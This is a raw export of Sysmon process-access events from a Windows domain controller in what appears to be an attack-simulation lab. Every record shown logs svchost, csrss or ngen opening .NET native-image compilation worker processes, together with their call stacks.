13:50:16.931{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-D203-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.915{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-D203-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.915{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-D203-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.853{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-D103-00000000A301}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.837{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-D103-00000000A301}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-D103-00000000A301}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-D003-00000000A301}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.775{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-D003-00000000A301}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.775{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-D003-00000000A301}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-CF03-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.681{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-CF03-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.681{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-CF03-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-DC03-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.962{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-DC03-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.962{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-DC03-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.931{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-DB03-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.915{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-DB03-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.915{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-DB03-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.853{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-DA03-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.837{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-DA03-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-DA03-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.790{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D903-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.790{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D903-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 